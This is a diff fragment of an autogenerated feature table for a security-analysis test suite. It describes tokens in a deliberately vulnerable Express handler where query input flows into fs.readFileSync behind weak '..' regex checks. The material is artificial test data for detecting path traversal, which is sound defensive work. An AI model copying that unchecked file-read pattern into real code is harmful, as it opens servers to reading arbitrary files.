autogenerated/TaintedPath/normalizedPaths.js:385:25:385:33 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:385:25:385:33 | normalize | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:385:25:385:33 | normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:385:25:385:33 | normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:385:35:385:37 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:385:35:385:37 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:385:35:385:37 | req | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:385:35:385:37 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:385:35:385:37 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:385:35:385:43 | req.query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:385:35:385:43 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:385:35:385:43 | req.query | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:385:35:385:43 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:385:35:385:43 | req.query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:385:35:385:45 | req.query.x | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/normalizedPaths.js:385:35:385:45 | req.query.x | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:385:35:385:45 | req.query.x | calleeImports | path | @@ -9678,6 +79362,66 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:385:35:385:45 | req.query.x | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:385:35:385:45 | req.query.x | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:385:35:385:45 | req.query.x | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:385:39:385:43 | query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:385:39:385:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:385:39:385:43 | query | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:385:39:385:43 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:385:39:385:43 | query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:385:45:385:45 | x | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:385:45:385:45 | x | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:385:45:385:45 | x | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:385:45:385:45 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:385:45:385:45 | x | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:386:7:386:16 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:386:7:386:16 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:386:7:386:16 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:386:7:386:16 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:386:7:386:16 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:386:7:386:27 | pathMod ... bsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:386:7:386:27 | pathMod ... bsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:386:7:386:27 | pathMod ... bsolute | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:386:7:386:27 | pathMod ... bsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:386:7:386:27 | pathMod ... bsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:386:7:386:33 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:386:7:386:33 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:386:7:386:33 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:386:7:386:33 | exceptional return of pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:386:7:386:33 | exceptional return of pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:386:7:386:33 | pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:386:7:386:33 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:386:7:386:33 | pathMod ... e(path) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:386:7:386:33 | pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:386:7:386:33 | pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:386:18:386:27 | isAbsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:386:18:386:27 | isAbsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:386:18:386:27 | isAbsolute | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:386:18:386:27 | isAbsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:386:18:386:27 | isAbsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:388:3:388:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:388:3:388:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:388:3:388:4 | fs | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:388:3:388:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:388:3:388:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:388:3:388:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:388:3:388:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:388:3:388:17 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:388:3:388:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:388:3:388:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:388:3:388:23 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:388:3:388:23 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:388:3:388:23 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:388:3:388:23 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:388:3:388:23 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:388:3:388:23 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:388:3:388:23 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:388:3:388:23 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:388:3:388:23 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:388:3:388:23 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:388:6:388:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:388:6:388:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:388:6:388:17 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:388:6:388:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:388:6:388:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:388:19:388:22 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:388:19:388:22 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:388:19:388:22 | path | calleeImports | fs | @@ -9687,6 +79431,36 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:388:19:388:22 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:388:19:388:22 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:388:19:388:22 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:389:7:389:23 | !path.match(/\\./) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:389:7:389:23 | !path.match(/\\./) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:389:7:389:23 | !path.match(/\\./) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:389:7:389:23 | !path.match(/\\./) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:389:7:389:23 | !path.match(/\\./) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:389:8:389:11 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:389:8:389:11 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:389:8:389:11 | path | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:389:8:389:11 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:389:8:389:11 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:389:8:389:17 | path.match | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:389:8:389:17 | path.match | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:389:8:389:17 | path.match | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:389:8:389:17 | path.match | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:389:8:389:17 | path.match | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:389:8:389:23 | exceptional return of path.match(/\\./) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:389:8:389:23 | exceptional return of path.match(/\\./) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:389:8:389:23 | exceptional return of path.match(/\\./) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:389:8:389:23 | exceptional return of path.match(/\\./) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:389:8:389:23 | exceptional return of path.match(/\\./) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:389:8:389:23 | path.match(/\\./) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:389:8:389:23 | path.match(/\\./) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:389:8:389:23 | path.match(/\\./) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:389:8:389:23 | path.match(/\\./) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:389:8:389:23 | path.match(/\\./) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:389:13:389:17 | match | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:389:13:389:17 | match | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:389:13:389:17 | match | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:389:13:389:17 | match | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:389:13:389:17 | match | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:389:19:389:22 | /\\./ | CalleeFlexibleAccessPath | path.match | | autogenerated/TaintedPath/normalizedPaths.js:389:19:389:22 | /\\./ | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:389:19:389:22 | /\\./ | calleeImports | path | @@ -9696,6 +79470,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:389:19:389:22 | /\\./ | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:389:19:389:22 | /\\./ | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:389:19:389:22 | /\\./ | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:390:5:390:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:390:5:390:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:390:5:390:6 | fs | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:390:5:390:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:390:5:390:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:390:5:390:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:390:5:390:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:390:5:390:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:390:5:390:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:390:5:390:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:390:5:390:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:390:5:390:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:390:5:390:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:390:5:390:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:390:5:390:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:390:5:390:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:390:5:390:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:390:5:390:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:390:5:390:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:390:5:390:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:390:8:390:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:390:8:390:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:390:8:390:19 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:390:8:390:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:390:8:390:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:390:21:390:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:390:21:390:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:390:21:390:24 | path | calleeImports | fs | @@ -9705,6 +79504,36 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:390:21:390:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:390:21:390:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:390:21:390:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:392:7:392:25 | !path.match(/\\.\\./) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:392:7:392:25 | !path.match(/\\.\\./) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:392:7:392:25 | !path.match(/\\.\\./) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:392:7:392:25 | !path.match(/\\.\\./) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:392:7:392:25 | !path.match(/\\.\\./) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:392:8:392:11 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:392:8:392:11 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:392:8:392:11 | path | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:392:8:392:11 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:392:8:392:11 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:392:8:392:17 | path.match | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:392:8:392:17 | path.match | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:392:8:392:17 | path.match | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:392:8:392:17 | path.match | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:392:8:392:17 | path.match | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:392:8:392:25 | exceptional return of path.match(/\\.\\./) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:392:8:392:25 | exceptional return of path.match(/\\.\\./) | contextSurroundingFunctionParameters | | +| 